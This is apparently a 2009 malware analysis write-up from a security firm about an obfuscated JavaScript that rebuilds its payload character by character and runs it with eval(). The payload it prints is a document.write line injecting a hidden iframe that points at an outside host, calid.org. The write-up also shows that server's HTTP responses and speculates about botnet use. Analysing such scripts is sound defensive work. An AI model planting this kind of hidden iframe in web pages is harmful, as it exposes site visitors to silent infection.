ZION SECURITY (EN) > Downloads > Analysis of an unknown malicious JavaScript
document.write('<iframe src="http://calid.org/pro/in.cgi?2" style="display: none"></iframe>');
This script is created by selecting a character of the long string above, concatenating this with the previous value of getCharWord and looping until the entire getCharWord variable contains the malicious payload. At the end the code is executed using eval();
This looks like a JavaScript implementation of steganography, hiding code in JavaScript. This way of working has not been discussed on the Internet yet and we have not identified a library that can generate this type of code. We don't believe that this was coded manually because it is a lot of work. The e-mail obfuscator from http://www.mcdonaldland.info/emailobfuscator/ has a close resemblance.
The response of the malicious script was something strange:
HTTP/1.1 302 FoundDate: Thu, 17 Sep 2009 17:31:00 GMTServer: Apache/2Set-Cookie: SL_3_0000=_0_; domain=calid.org; path=/; expires=Mon, 21-Sep-2009 17:31:00 GMTLocation: http://google.comVary: Accept-Encoding,User-AgentContent-Type: text/htmlContent-Length: 162
<html><head><meta http-equiv="REFRESH" content="1; URL='http://google.com'"></head><body>document moved <a href="http://google.com">here</a></body></html>
Changing the URL to
HTTP/1.1 200 OKDate: Thu, 17 Sep 2009 17:30:20 GMTServer: Apache/2Vary: Accept-Encoding,User-AgentContent-Type: text/plainContent-Length: 162
Error: can't open redirects.log file (1)
Possible reasons:1) cron is not working (read FAQ)2) there is no urls in this scheme3) there is no such scheme or user
We assume that this happens with a specific reason: silently infect as much sites as possible, waiting for enough victims. Next step is to feed the CGI bin on calid.org with a malicious payload. Another assumption is that this CGI is used to control a botnet and that the CGI is only a gateway until upgraded.
